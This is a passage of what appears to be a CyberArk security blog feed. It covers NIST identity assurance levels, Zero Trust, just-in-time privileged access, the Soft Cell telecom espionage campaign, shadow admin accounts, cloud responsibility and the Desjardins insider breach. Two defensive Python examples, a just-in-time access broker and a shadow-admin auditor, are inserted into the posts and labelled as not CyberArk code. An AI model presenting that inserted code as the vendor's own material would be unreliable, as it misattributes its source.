IAL3 is described in the following way: “Physical presence is required for identity proofing. Identifying attributes must be verified by an authorized and trained CSP representative. As with IAL2, attributes could be asserted by CSPs to RPs in support of pseudonymous identity with verified attributes. A CSP that supports IAL3 can support IAL1 and IAL2 identity attributes if the user consents.”

In essence, IAL3 is stricter than IAL2 in terms of requiring further and stronger evidence of the user’s attributes so as to protect the identity and the relying party from impersonation, fraud or other such issues. Biometrics are considered mandatory as part of IAL3.

Summary of the IAL Requirements across LOA 1, 2 and 3

The actual requirements of the three IALs are discussed far more comprehensively in the document, but below is a summary table of them, also courtesy of the guidelines document.

Table: Summary of IAL requirements, Source: NIST Special Publication 800-63A

The guidelines document goes into much more detail about items such as what “WEAK”, “FAIR”, “STRONG”, “SUPERIOR”, etc. mean in the context of verification and validation of credentials.

Selecting an IAL

Selecting an IAL for your service (relying party) can be a difficult proposition, but NIST has been kind enough to include an IAL decision tree as part of the main 800-63-3 document, as shown in the image below.

Figure: IAL decision tree, Source: NIST Special Publication 800-63-3

The document also goes into more detail on the six decision points above.

The Road Ahead…

Enrollment and Identity Proofing is increasingly gaining in importance as we see digital transformation of organizations and business models across the board, resulting in an explosion of digital services. With this explosion, we’re also starting to see more impersonation and fraud in the consumption of those digital services. New models like Forrester’s Zero Trust framework or Gartner’s CARTA are also increasingly incorporating capabilities related to verification and validation of the user’s real-world identity, along with proof of possession of authenticators, into the process of authentication and authorization to digital services. Along those lines, Idaptive continues to partner with vendors in the enrollment and identity proofing space to augment our authentication and federated assurance capabilities, in our goal to secure and protect access to online services.

NIST Series Part 1

NIST Series Part 2

NIST Series Part 3

NIST Series Part 4

]]>
CyberArk Docs: Privileged Access Management Documentation for All https://www.cyberark.com/blog/cyberark-docs-privileged-access-security-documentation-for-all/ Tue, 09 Jul 2019 13:00:47 +0000 https://www.cyberark.com/?p=70099

Not long ago on the CyberArk Conjur blog, our DevOps community manager and evangelist John Walsh explored the history and evolution of open source software. It’s a great read that highlights the clear relationship between open source adoption and DevOps success in the enterprise, along with the power of community engagement and information sharing.

We’ve embraced this team player approach with CyberArk Conjur and our fast-growing CyberArk Marketplace, which features community contributions. Furthering this commitment to collaboration and transparency, today we published our product documentation library online, making it freely available to everyone – no login required.

Featuring newly simplified and enhanced documentation on CyberArk version 10.10, CyberArk Docs makes it even easier to get your questions answered – fast.

Considering a privileged access management solution? Whether your organization is just getting started or already focused on implementing advanced privileged access management strategies to align with digital transformation initiatives, CyberArk Docs is a good place to start. Get to know CyberArk by browsing documentation by product: Core Privileged Access Security, CyberArk Privilege Cloud, Endpoint Privilege Manager and Application Access Manager. On each of these product pages, it’s easy to find information on security fundamentals, how to get started with a deployment, how to configure or manage your environment and how to install or upgrade components. The site is easy to navigate, offering documents organized by functional role with information for end users, administrators and developers.

CyberArk Docs is also part of our broader CyberArk Technical Community site, available to current customers and partners, where you can connect and engage with peers and subject matter experts on CyberArk products and services. Through the Technical Community you can now browse and download helpful documentation from CyberArk Docs, take advantage of our comprehensive knowledge base, access a wide range of online training courses and post integrations and reviews on the CyberArk Marketplace. There’s also a simple way to submit support cases and enhancement requests.

CyberArk Docs is just one of the many ways we’re extending value to the broader cybersecurity community. Inspired by open source, our goal is to make it easier for end-users, admins, developers and security professionals alike to access the information and tools they need to collaborate, innovate, build and succeed.

Check CyberArk Docs out today and let us know what you think on Twitter @CyberArk or via email at Documentation@CyberArk.com.

]]>
NIST 800-63-3 Digital Identity Guidelines – A Primer https://www.cyberark.com/blog/nist-800-63-3-digital-identity-guidelines-a-primer/ Tue, 02 Jul 2019 15:01:14 +0000 https://www.cyberark.com/?p=99020

The National Institute of Standards and Technology (NIST), in June 2017, published a new set of guidelines as part of their special publication 800-63-3 that provided technical requirements for federal agencies implementing digital identity services. These guidelines have been instrumental in helping me and many others in the Identity and Access Management space learn, think through, and build out product strategy for our product lines. I’ve had the privilege and good fortune to speak to many of Idaptive’s customers about these guidelines in the context of their identity and authentication assurance needs, and I’ve always been encouraged and inspired by the immense amount of interest and debate these guidelines generate. Also, I recently had the great privilege to speak to some incredibly smart folks at NIST about Idaptive and our technology, and it made me realize that it was time to put pen to paper and provide a quick perspective on these guidelines. This is part one of a 4-part blog series.

The 800-63-3 Digital Identity guidelines have expanded on the singular concept of level of assurance (LOA) for all electronic authentication of digital identities that was originally introduced in 800-63-2. The new guidelines are more specific to the business needs and use cases where digital identities are to be used. Very broadly, the new guidelines cover three processes: Identity Proofing, Digital Authentication and Federated Identity Management.

The Digital Identity, as NIST explains it

The digital identity is a unique representation of the physical subject, or individual (in Idaptive’s world, given our focus), in the online world, that is engaged in an online transaction. This transaction could be as simple as just logging into a single service, or as complex as performing an e-commerce transaction across multiple services or websites. The purpose of the digital identity is often limited to use in the context of the service alone, and it does not necessarily need to include all the physical-world attributes or information of the individual.

Identity Proofing, Digital Authentication and Federated Identity Management

Figure: Digital Identity Model, Source: NIST Special Publication 800-63 Volume 3 Revision 3, Digital Identity Guidelines

The image above provides an excellent overview of the key processes digital identities participate in. CSP, in this diagram, refers to a Credential Service Provider that is responsible for performing the enrollment, identity proofing and issuance processes. The Verifier is the service or party that verifies the individual’s digital identity.

Enrollment and Identity Proofing is the process of assuring that an individual (or subject) is who they claim to be, and “IAL” (Identity Assurance Level) refers to the level of assurance (or “strength”) with which this assurance can be described. An example of proofing an individual would be to ask them questions about themselves that only they (hopefully) would know. Alternately, another example would be to ask them to submit a copy of their state-issued Driver’s License, proving possession of a state-attested identity document.

Digital Authentication is the process of an individual attempting to access a service, and “AAL” (Authentication Assurance Level), similarly, is used to provide assurance that the individual accessing a service is in possession of one or more authenticators associated with them. An example of this would be to send a one-time password to the individual’s registered phone via a notification or a text. Another example would be to ask the user to authenticate using their Personal Identity Verification, or PIV, card.

Finally, Federated Identity management involves a user, authenticated by a third party Identity Provider (IdP), attempting to access a service (Service Provider) or a Relying Party (RP) via a token or an assertion that the IdP sends to the service, and “FAL” (Federated Assurance Level) refers to the strength of that assertion that is used to communicate authentication and attribute information to the RP. 800-63-3 is further broken down into 800-63-A which provides guidelines on Enrollment and Identity Proofing and covers Identity Assurance Levels, 800-63-B which provides guidelines on Authentication and Lifecycle Management and covers Authentication Assurance Levels and finally, 800-63-C which provides guidelines on Federation and Assertions, and covers Federated Assurance Levels.

Levels of Assurance, at a glance

The NIST guidelines document provides an excellent summary of what constitutes Levels of Assurance for each of the three key processes mentioned above. Levels of Assurance for a process, for all practical purposes, are indicators of the “strength” of the identity and access management controls implemented as part of that process. Typically, they range from level 1 to level 3. Below is a series of tables that are included in the guideline document that provide the summaries.

Identity Assurance Levels

Table: Identity Assurance Levels summary, Source: NIST Special Publication 800-63-3

Authentication Assurance Levels

Table: Authentication Assurance Levels summary, Source: NIST Special Publication 800-63-3

Federated Assurance Levels

Table: Federated Assurance Levels summary, Source: NIST Special Publication 800-63-3

Each of these guidelines, by itself, deserves a series of blogs, if not a whitepaper. To that end, my next series of blogs on this topic will focus on providing additional color on 800-63-A, 800-63-B and 800-63-C, how organizations should go about adopting these guidelines and choosing what level of assurance they should ideally target, and how Idaptive can help with achieving high levels of assurance for 800-63-B and 800-63-C. Stay tuned!

NIST Series Part 1

NIST Series Part 2

NIST Series Part 3

NIST Series Part 4

]]>
Protect, Detect, Deter, Respond is Not a Security Strategy https://www.cyberark.com/blog/protect-detect-deter-respond-is-not-a-security-strategy/ Mon, 01 Jul 2019 19:37:29 +0000 https://www.cyberark.com/?p=98920

The last few weeks haven’t been kind to cybersecurity. From the healthcare organizations tasked with handling our most sensitive patient records to startups that are supposed to be the vanguard of tech and immune to this sort of thing — no organization is genuinely safe. And no matter the strength of the defensive postures that might be put in place, it seems that malicious actors are still able to circumvent them and break through.

That’s because most organizations today have the wrong approach when it comes to cybersecurity.

The majority of executives today believe that bolstering protection against security vulnerabilities should be their number one priority — when, in fact, 80 percent of breaches today are the result of default or stolen passwords according to the Verizon Data Breach Investigations Report.

It’s not their fault; fancy zero-day attacks and stolen NSA tools steal the headlines and make cybersecurity seem like complicated stuff. What is clear is what’s not working. A strong perimeter “barrier” is no longer effective. It’s just not possible to separate the “good guys” from the “bad guys” (and they are likely inside the gates already). Passwords alone can’t stand up to the breadth and sophistication of today’s relentless attacks.

Technology by itself won’t eliminate the risk or guarantee that information stays safe without first implementing the right strategy and practices.

A prominent industry analyst summed things up nicely at a sold-out cybersecurity summit I recently attended:

“People will say, ‘We’re doing things. We’re working on it,’” he said. “Well, guess what Target’s strategy was before the breach? Protect, detect, deter, respond. Guess what OMB’s strategy was before the breach? Protect, detect, deter, respond. That’s not a strategy. Those are things that you do. Those are pieces of it.”

He’s right. “Protect, detect, deter, respond” is not a security strategy. It’s a reaction to the forces at play in the cybersecurity world today.

That’s why Idaptive has been built around a proven approach that does actually reduce data breaches: Zero Trust.

Zero Trust is a foundational approach to cybersecurity that ensures every person and device granted access are who and what they say they are. It’s the single most important step a company can take to help themselves make sense of the increasing complexity tied to cybersecurity and identity & access today. The philosophy that defines Zero Trust is “never trust, always verify,” which ensures that every user is verified, every device is validated, and access is intelligently limited — every time. Studies have shown that companies adopting this approach experience 50 percent fewer breaches, while also reducing the overall cost of access technology by an average of 40 percent.

“If you stand up and say, ‘Our security strategy is to work towards a Zero Trust infrastructure.’ There it is,” this prominent industry analyst concluded. “One sentence. Everyone can get behind that.”

So, stay tuned in the coming weeks as I dig into the steps your organization can take to adopt a Zero Trust base, including how to make existing and new technology work and how to get your teams to buy in to Zero Trust. If you’re serious about taking your cybersecurity to the next level and keeping sensitive information safe, you won’t want to miss them.

Read the Zero Trust series here:

Zero Trust Series – 1  What Is Zero Trust and Why Is it So Important?

Zero Trust Series – 2 Like the Night King, Perimeter Defense is Dead

Zero Trust Series – 3 Imposter Syndrome: Why You Can’t Separate the “Good Guys” from the “Bad Guys”

Zero Trust Series – 4 Passwords are Just one Piece of the Cybersecurity Puzzle

Zero Trust Series – 5 The Future of Cybersecurity is Artificial: Intelligence Will Transform Enterprise Governance

Zero Trust Series – 6 Protect, Detect, Deter, Respond is Not a Security Strategy.

Zero Trust Series – 7 Upping the Security Ante: How to Get Teams’ Buy-in for Zero Trust

Zero Trust Series – 8 Next-Gen Access and Zero Trust are the PB&J of Security

Zero Trust Series – 9 Passwords Need Fixing. Zero Trust is the Solution.

Zero Trust Series – 10 The One-Two Punch of Zero Trust. Verify Every User, Validate Every Device.

Zero Trust Series – 11 “Should I Stay or Should I Go?” Artificial Intelligence (And The Clash) has the Answer to Your Employee Access Dilemma.

Zero Trust Series – 12 Grow Up! Plotting Your Path Along the Zero Trust Maturity Model

]]>
Just-In-Time Access: Right Access, Right Resources, Right Reasons https://www.cyberark.com/blog/just-in-time-access-right-access-right-resources-right-reasons/ Thu, 27 Jun 2019 14:25:42 +0000 https://www.cyberark.com/?p=69645

Just-in-time is a management philosophy that can be traced back to the early 1970s in Toyota manufacturing plants. Taiichi Ohno introduced this methodology in order to have production meet customer demand precisely and minimize waste. The major components of just-in-time manufacturing are: continuous improvement; eliminating waste; kanbans, which stop processes abruptly if they are not working; jidoka, which grants machines autonomy to carry out tasks so that workers can be more productive; and levelled production, which smooths the flow of products through the factory. In order to successfully implement this business practice, teams need to be laser-focused on process, eliminating unnecessary activities and constantly striving for the best possible solution to a given problem. However, just-in-time is still just one piece of the overall puzzle and cannot be viewed as the singular reason for the success of Toyota.

In recent years, cybersecurity has adopted its own form of just-in-time called just-in-time access. Like its manufacturing namesake, just-in-time (JIT) access is geared towards removing waste, which is, in this case, unneeded access. This method of securing critical data and resources is implemented with the idea of providing the right person with the right access to the right resource at (and for) the right time for the right reasons — or, in other words, elevating privileges only when and where they’re required. Providing an audit trail of activities is essential for JIT, or else there is a trade-off between security and ease of use. Both are critical.

Just-in-time access is geared towards eliminating standing access and then dynamically bumping up privileged rights only when requested. The methodology, ideally, reduces friction for end-users and improves the security posture of the organization – so long as a clear and robust audit trail is provided. JIT eliminates standing access, thus providing better protection from attackers attempting to move laterally through the system.

Enterprises and analysts alike see JIT as being the next big thing in cybersecurity because it ensures that technical access is only provisioned to users or accounts when absolutely necessary. Gartner has highlighted privileged access management in recent years[1][2] and has written about just-in-time access in a recent report, Best Practices for Privileged Access Management Through the Four Pillars of PAM. Per Gartner, JIT access is the recommended method for privileged access; it is based on the principle that access is granted only for a short period of time and then removed, leaving no standing privileged access[3]. Further:

  • “A privileged account and session management (PASM) solution that can broker access to a privileged account, then remove access to that account.”
  • “Some PASM solutions can create an ephemeral account ‘on the fly,’ to be used only for a particular one-time use. The account would then be unavailable as soon as the user logs off and could either be removed or retained for future reuse.”
  • “A privilege elevation and delegation management (PEDM) solution could allow a user to temporarily elevate privileges for an account that is not privileged by default. Typically, this would enable a user to execute commands in privileged mode.”

These three concepts of just-in-time access share an underlying theme: reducing unneeded privileged access. This can be done with or without agents; it all depends on each organization’s propensity to manage them. An ideal solution will reduce unnecessary access to critical systems while simultaneously making things easier for employees. Organizations can institute policies that limit privileged access to the times when it is needed and cut it off outside the specified time frame, much like the “kanban” concept introduced by Ohno.

The typical workflow for just-in-time access is that a user (human or machine) requests access to a server, virtual machine or network device. The request is either checked against a policy of pre-approvals or goes to an administrator who either grants or denies access. (A jidoka could be useful here to enable task automation and ensure that workflows are followed and mundane tasks aren’t subject to human error.) The user, if granted access, enters the system and can go about their business as they normally would. After they’re done, they log off, and their access is revoked until they need it again. This just-in-time access workflow can be achieved in any of the above three ways, and it provides organizations with a new way of approaching privileged access management.
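The workflow just described, as an added example that is not CyberArk product code: a small broker that takes a request, either grants it from a pre-approval policy or parks it for an administrator, issues a time-bounded grant, revokes it on logoff or expiry, and writes every step to an audit trail so that standing access can be shown to be empty. The policy format, time-to-live values and audit line layout are assumptions.

```python
"""Minimal just-in-time access broker: request -> pre-approval or admin
decision -> time-bounded grant -> revoke on logoff/expiry, fully audited.
Added example; policy format, TTLs and log layout are assumptions."""
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

Key = Tuple[str, str]  # (user, resource)


@dataclass
class Grant:
    user: str
    resource: str
    expires_at: int  # epoch seconds


@dataclass
class JitBroker:
    # Pre-approval policy: (user, resource) -> maximum grant lifetime in seconds.
    policy: Dict[Key, int]
    grants: Dict[Key, Grant] = field(default_factory=dict)
    pending: Dict[Key, Tuple[str, int]] = field(default_factory=dict)
    audit: List[str] = field(default_factory=list)

    def _log(self, now: int, action: str, user: str, resource: str, detail: str = "") -> None:
        self.audit.append(f"{now} {action} user={user} resource={resource} {detail}".rstrip())

    def request(self, user: str, resource: str, reason: str, now: int) -> str:
        """Return 'granted' when policy pre-approves, else 'pending' for an admin."""
        key = (user, resource)
        self._log(now, "REQUEST", user, resource, f"reason={reason!r}")
        ttl = self.policy.get(key)
        if ttl is not None:
            self._issue(user, resource, ttl, now, "policy")
            return "granted"
        self.pending[key] = (reason, now)
        return "pending"

    def approve(self, admin: str, user: str, resource: str, ttl: int, now: int) -> bool:
        key = (user, resource)
        if key not in self.pending:
            return False
        del self.pending[key]
        self._issue(user, resource, ttl, now, f"admin={admin}")
        return True

    def deny(self, admin: str, user: str, resource: str, now: int) -> bool:
        if self.pending.pop((user, resource), None) is None:
            return False
        self._log(now, "DENY", user, resource, f"admin={admin}")
        return True

    def _issue(self, user: str, resource: str, ttl: int, now: int, approver: str) -> None:
        self.grants[(user, resource)] = Grant(user, resource, now + ttl)
        self._log(now, "GRANT", user, resource, f"ttl={ttl}s approved_by={approver}")

    def has_access(self, user: str, resource: str, now: int) -> bool:
        """Access exists only inside the grant window; expired grants are purged."""
        key = (user, resource)
        g = self.grants.get(key)
        if g is None:
            return False
        if now >= g.expires_at:
            del self.grants[key]
            self._log(now, "EXPIRE", user, resource)
            return False
        return True

    def logoff(self, user: str, resource: str, now: int) -> None:
        """Logging off removes the privilege immediately rather than at expiry."""
        if self.grants.pop((user, resource), None) is not None:
            self._log(now, "REVOKE", user, resource, "trigger=logoff")

    def standing_access(self) -> List[Key]:
        """The JIT goal: outside active sessions this list is always empty."""
        return sorted(self.grants)


if __name__ == "__main__":
    # Constructed policy: alice is pre-approved for one hour on db-prod-01.
    broker = JitBroker(policy={("alice", "db-prod-01"): 3600})
    print(broker.request("alice", "db-prod-01", "INC-1234 patch", now=1000))
    print(broker.request("bob", "db-prod-01", "reindex", now=2000))
    broker.approve("carol", "bob", "db-prod-01", ttl=900, now=2100)
    broker.logoff("bob", "db-prod-01", now=2600)
    print(broker.has_access("alice", "db-prod-01", now=4600), broker.standing_access())
    print("\n".join(broker.audit))
```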

As Mr. Ohno envisioned in the 70s, teams need a laser-focus on the task at hand, in this case cybersecurity. They must eliminate unnecessary activities (or access), lean on automation and strive to find the best solution to fit the given problem. Just-in-time access is subject to continuous improvement, since there is no single magic bullet to solve the issue of privileged access. But, just-in-time access can be a powerful tool for privileged access management just as it was for Mr. Ohno’s factory assembly line.

Stay tuned for Part 2 of the just-in-time access blog series, which will cover CyberArk’s numerous capabilities from a product standpoint and which methods are appropriate for which scenarios.

[1] Gartner, Top 10 Security Projects for 2019, Brian Reed et al., 11 February 2019

[2] Smarter With Gartner, Gartner Top 10 Security Projects for 2019, 18 June 2018

[3] Gartner, Best Practices for Privileged Access Management Through the Four Pillars of PAM, Michael Kelley and Felix Gaehtgens, 28 January 2019

]]>
Privileged Access Key to China’s Attack on Telecoms https://www.cyberark.com/blog/privileged-access-key-to-chinas-attack-on-telecoms/ Tue, 25 Jun 2019 15:26:04 +0000 https://www.cyberark.com/?p=69179

The recent attack by China on cellular companies – called Operation Soft Cell – is part of an espionage campaign that leverages privileged access through privileged accounts. Compromising credentials remains the weapon of choice for attackers and a top attack pattern.

We first encountered this pattern when Edward Snowden revealed Operation Socialist, a CIA and British Global Communication Headquarters (GCHQ) campaign that allegedly attempted to take control of one of the most widely spread telecommunications networks in the country – Belgian telecommunications company Belgacom. Access to Belgacom would allow intelligence agencies to obtain the metadata required to track specific target individuals. Aside from this new attack coming from a very different quarter, China’s APT 10 rather than the GCHQ, the attacks are very similar.

Operation Socialist, like the recent Soft Cell operation, leveraged privileged access and privileged accounts to take control of telecommunication systems and persist while remaining in the shadows. Neither of these attacks needed to exploit vulnerabilities or reveal sophisticated and aggressive tools, which cost a lot to develop. In both cases, the groups compromised the organization’s privileged accounts – namely domain admin accounts. Domain admin accounts have administrator rights over an entire domain, making them extremely useful to an attacker.

Domain admin accounts and other well-known privileged accounts are usually tightly controlled and monitored. However, there were still vulnerabilities to exploit. The attackers probably went after shadow admins: privileged accounts that aren’t members of the privileged Active Directory groups, which lets them fly under the radar and often go overlooked by organizations’ security teams.

These types of accounts have special privileges that allow an attacker to gain control of an entire network without being a member of a privileged group. Consequently, the attack leaves little trace, while still providing the attacker with flexibility. In the Soft Cell operation, the attackers launched a VPN service to give themselves shadow access to the network – possibly based on shadow admin accounts.
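An added audit example, not from the article or any CyberArk product, of how a security team can surface the shadow admins described above before an attacker does: it walks a constructed directory snapshot and flags any principal that holds a control right over a privileged group (or one of its members) without itself being a member of a privileged group. The snapshot format, the privileged-group list and the set of rights treated as control rights are assumptions.

```python
"""Flag 'shadow admins': principals with control rights over privileged groups
or their members that are not themselves members of a privileged group.
Added example; snapshot format, group list and right names are assumptions."""
from typing import Dict, List, Set

# Rights that grant effective control over an object (assumption; a real audit
# would enumerate the directory's actual extended rights and property sets).
CONTROL_RIGHTS = {"GenericAll", "WriteDacl", "WriteOwner", "AddMember", "ForceChangePassword"}
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins"}


def transitive_members(groups: Dict[str, List[str]], group: str) -> Set[str]:
    """Resolve nested group membership down to leaf principals (cycle-safe)."""
    seen: Set[str] = set()
    stack = [group]
    leaves: Set[str] = set()
    while stack:
        g = stack.pop()
        if g in seen:
            continue
        seen.add(g)
        for member in groups.get(g, []):
            if member in groups:
                stack.append(member)   # nested group: keep expanding
            else:
                leaves.add(member)
    return leaves


def principal_expansion(groups: Dict[str, List[str]], trustee: str) -> Set[str]:
    """An ACE trustee may be a group; expand it to the users who inherit the right."""
    return transitive_members(groups, trustee) if trustee in groups else {trustee}


def find_shadow_admins(groups: Dict[str, List[str]], aces: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Return {user: [reasons]} for every non-privileged user holding a control right
    over a privileged group or over a member of one."""
    privileged_users: Set[str] = set()
    for g in PRIVILEGED_GROUPS:
        privileged_users |= transitive_members(groups, g)
    sensitive_objects = PRIVILEGED_GROUPS | privileged_users

    findings: Dict[str, List[str]] = {}
    for ace in aces:
        if ace["right"] not in CONTROL_RIGHTS or ace["object"] not in sensitive_objects:
            continue
        for user in principal_expansion(groups, ace["trustee"]):
            if user in privileged_users:
                continue  # a real admin: visible in the group and already monitored
            reason = f"{ace['right']} on {ace['object']} (via {ace['trustee']})"
            findings.setdefault(user, []).append(reason)
    return {u: sorted(r) for u, r in sorted(findings.items())}


# Constructed directory snapshot (not real data).
GROUPS = {
    "Domain Admins": ["admin.jane", "Tier0 Ops"],
    "Tier0 Ops": ["admin.raj"],
    "Enterprise Admins": ["admin.jane"],
    "Helpdesk": ["hd.sam", "hd.lee"],
}
ACES = [
    {"object": "Domain Admins", "trustee": "admin.jane", "right": "GenericAll"},       # legitimate
    {"object": "Domain Admins", "trustee": "svc_backup", "right": "WriteDacl"},        # shadow admin
    {"object": "Enterprise Admins", "trustee": "svc_backup", "right": "AddMember"},    # shadow admin
    {"object": "admin.raj", "trustee": "Helpdesk", "right": "ForceChangePassword"},    # via group
    {"object": "Helpdesk", "trustee": "hd.sam", "right": "GenericAll"},                # not sensitive
    {"object": "Domain Admins", "trustee": "Everyone", "right": "ReadProperty"},       # not a control right
]

if __name__ == "__main__":
    for user, reasons in find_shadow_admins(GROUPS, ACES).items():
        print(user)
        for r in reasons:
            print("   ", r)
```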

Using shadow admins to gain access isn’t the only shortcut that the attackers behind Operation Soft Cell and Operation Socialist used. In both cases, the attacks on the telecom companies targeted the supply chain. Just like hardware manufacturing facilities, software companies that provide product updates or internet traffic backbone servers are vulnerable to supply chain attacks.

This has become common with many attackers redirecting their efforts from well-defended organizations to their less-secure supply chains. Attackers who want intimate and persistent access to a company’s data and IP can replace sending phishing emails to vast numbers of employees with bugging the company’s hardware. Attackers who want access to an individual’s metadata, location and calls for a longer period of time, can replace exposing a costly WhatsApp vulnerability with compromising a specific individual’s phone.

]]>
Where Security Accountability Stops and Starts in the Public Cloud https://www.cyberark.com/blog/where-accountability-stops-and-starts-in-the-cloud/ Tue, 25 Jun 2019 13:23:54 +0000 https://www.cyberark.com/?p=69163

For years, security was cited as a prime reason not to put sensitive data or valuable workloads into the public cloud. It’s safe to say that situation has changed. In fact, the CyberArk Global Advanced Threat Landscape Report 2019: Focus on Cloud found that the vast majority (94 percent) of the 1,000 global organizations surveyed used cloud services in some way, shape or form. We see that this use is often to support digital transformation initiatives.

The public cloud isn’t being used for low-value data or unimportant assets. For instance, nearly half of the respondents are using SaaS-based business critical applications and a similar percentage use the public cloud for regulated customer data.

So far, so unsurprising.

The eye-opening discovery was the contrast between what organizations see as the major benefit derived from their use of cloud versus their understanding of their cloud security accountability.

The prime benefit that the organizations surveyed hoped to see from their usage of cloud was the ability to offload security to the cloud vendor, either completely or in part. This was potentially alarming, to say the least. Cloud vendors take responsibility for certain aspects of security when companies use their services, but they are very clear about where their clients must step in and assume accountability. Protecting customer data remains the responsibility of the client.

Then, we found that three quarters of survey respondents, perhaps blindly, entrust the security of their cloud workloads completely to the cloud vendor while half this number realize that this will not provide them with broad protection – but do it anyway. At this point, it’s obvious that the shared security responsibility model, which is clearly communicated by major cloud vendors, is either not well-understood or being ignored by many organizations.

Our report looked further into how privileged credentials are protected in the cloud and whether the high-value privileged credentials that give access to the most sensitive cloud-based data and assets were being properly secured.

It shows widespread lack of awareness about the existence of privileged accounts, secrets and credentials in IaaS and PaaS environments as well as the lack of a strategy to secure them. With less than half of all respondents reporting having a privileged access management plan for the cloud, our findings indicate that organizations could be placing themselves – and their customers’ data – at significant risk.

For more details, download our eBook.

]]>
Data Breach at Desjardins Bank Caused by Malicious Insider https://www.cyberark.com/blog/data-breach-at-desjardins-bank-caused-by-malicious-insider/ Fri, 21 Jun 2019 22:15:50 +0000 https://www.cyberark.com/?p=68947

The largest federal credit union in North America, Canadian bank Desjardins Group, was the victim of a data breach that leaked information on 2.9 million members.

While member passwords, security questions and PINs weren’t compromised, the leak did reveal sensitive data like names, addresses, birth dates, social insurance numbers (the Canadian equivalent of the social security number), email addresses and information on transaction habits for individual members. Business members saw their business names, telephone numbers, the names of owners and their AccèsD Affaires account users exposed.

The data breach wasn’t the result of an outside cyber attacker, but a malicious insider – someone within the company’s IT department who decided to go rogue and steal protected personal information from his employer. It’s easy to think of data breaches as the fault of cyber attackers hunched over laptops somewhere far away, but sometimes the real threat doesn’t need to break in. He’s inside the building with access to sensitive systems and personal data already.

Working in the company’s IT department, the malicious insider behind the Desjardins Group breach already had some level of privileged access, and it’s likely that this is what he abused to access members’ personally identifiable information (PII). What’s not as clear is why this activity wasn’t detected earlier. An early report from CBC states that it took several months to learn of the scope of the data-gathering scheme, a troubling trend that doesn’t seem to be going away. A report published by the Ponemon Institute estimates that the average time to identify a breach was 197 days in 2018 – more than 6 months. This gives malicious insiders or external attackers more than enough time to wreak havoc on their target.

According to Guy Cormier, president and CEO of Desjardins Group, this wasn’t an ordinary case of a company that had no controls in place to secure privileged access. He said that no one person at the bank has authority to access the information of all of the members. Apparently, the malicious insider in question used his own access and the privileged access of others to assemble the data trove. No matter what tactics or techniques were used by this attacker, foundational measures such as a properly architected privileged access management solution and multi-factor authentication likely would have thwarted the malicious insider from securing unauthorized access to the privileged credentials of his colleagues.

While the malicious insider has been fired, much of the damage has already been done. Desjardins first noticed a suspicious transaction all the way back in December 2018, but only recently learned the full scale of the breach. During that period of time, Desjardins collaborated with the police to investigate the suspicious transaction, discover the extent of the data breach, the identities of those affected and find the culprit. (He has since been arrested, but as of writing, has not been charged with the crime.)

In the meantime, Desjardins Group has promised to reimburse its members for any losses stemming from this data breach and to provide them with 12-month credit monitoring plans. While Desjardins Group hasn’t released the figures accounting for the damage, a breach with this level of notoriety will likely be costly – especially in terms of long-term brand damage and consumer trust. According to a study by Comparitech Ltd., public companies that have suffered a data breach underperform the Nasdaq by 15.6% three years after they reveal the breach.

This breach shows that a defense-in-depth security strategy that includes privileged access management, multi-factor authentication, and the detection of anomalous behavior with tools such as database activity monitoring has never been more crucial. While insider threats can be more difficult to identify, especially in a case where the user had privileged access rights, having a solution in place to monitor for unusual and unauthorized activities that can take automated remediation steps as needed can help reduce the amount of time it takes to stop an attack and minimize data exposure. No one wants to have to wait six months or more to find out the full extent of the damage.

To learn more about how to detect insider threats and stop them, read The Danger Within: Unmasking Insider Threats.

To learn more about privileged access management, visit the Gartner Magic Quadrant for Privileged Access Management and read Privileged Access Security for Dummies.

Missing the Forest for the Trees: Top 5 CISO Pitfalls in Cybersecurity https://www.cyberark.com/blog/missing-the-forest-for-the-trees-top-5-ciso-pitfalls-in-cybersecurity/ Thu, 20 Jun 2019 15:14:22 +0000 https://www.cyberark.com/?p=68789

There is a lack of focus in cyber security.  This rarely stems from lack of hard work, desire, technical ability or aspiration.  Many cybersecurity leaders and teams voice concern around lack of funding, minimal executive support and share all too common stories of burnout at all levels of the organization (including the CISO).  However, these are often symptoms rather than root causes.  Without understanding the root causes, cyber security leaders can miss the forest for the trees — with the company’s true security risk reduction suffering for it.

Following are recommended actions CISOs can take to avoid five common pitfalls.  Subsequent articles will get into more depth on each.

1. Prioritize business risk

Many cybersecurity programs are attempting to boil the ocean rather than focusing on or starting with what’s most important for the business.  If you knew that 20% of the information, business processes, and operations were what mattered most to your business, wouldn’t you put more effort into protecting that 20%?

There are some legacy methodologies companies use to attempt this.  Some companies have focused on traditional information classification frameworks to identify the most critical data and assets to protect, which is not a bad place to start. However, it tends to be heavily weighted on data theft (confidentiality), leaving integrity and availability concerns disconnected. Business continuity and IT disaster recovery programs and plans traditionally work to ensure that they are able to react to availability issues from any type of outage.  That said, in many cases, these efforts are disjointed and data integrity risks are largely left to be managed by a quality or compliance department.

What to do: CISOs can help their companies connect deeply with their business and understand worst-case scenarios for information theft, manipulation or operational disruption, not limiting thinking to IT systems.  If you narrow your focus to securing the elements most critical to your business, you can build speed and depth to protect what matters most for your company’s livelihood.

Think about it this way: If your company has 1,000 IT systems and 10 different functional areas, comprising 500 business processes, then where do you start?  How far do you go?  Is everything critical?  I’ve seen companies fail to answer this question and stall or significantly slow their efforts on a critical control or focus only on one risk dimension (e.g. compliance, or data theft).

You can identify your most critical business risks by imagining what a CEO would be most concerned about if a cyber attack hit at 3 a.m. on a Saturday. The CEO won’t be thinking about the technical details or what strain of malware is the most likely: The focus will be on business risk and operational impact.  Keep this in mind when you choose where to focus your information security program.

2. Avoid getting caught up in the media’s fascination with reporting on breaches

Media distractions are on the rise.  Due to mostly privacy-driven data breach reporting laws, media attention tends to focus on customer breaches and exposed personal information.  This reporting bias doesn’t account for all of the internal and external attack types and the companies’ true risk impact profile. When you’re inundated with stories of cybersecurity breaches, it’s easy for your company’s executives to get into a reactive mindset or to start exhibiting confirmation bias about threats that may or may not be applicable to, or among the top risks within, an organization’s sector.  This kind of thinking can point you away from your company’s biggest risks.

What to do: While you can’t control the articles your company executives read, there is a strategy to avoid whipsaw reactions to specific vulnerability and breach-related news.  You can leverage news media in a way that provides isolated value instead of distraction by getting deeply involved in threat intelligence and sharing with other companies (especially within the same industry or sector). Evaluate the input from the media against your business-driven risk management processes so that you can rationalize what you should react to and act upon.

3. Be strategic about your cyber tool plays

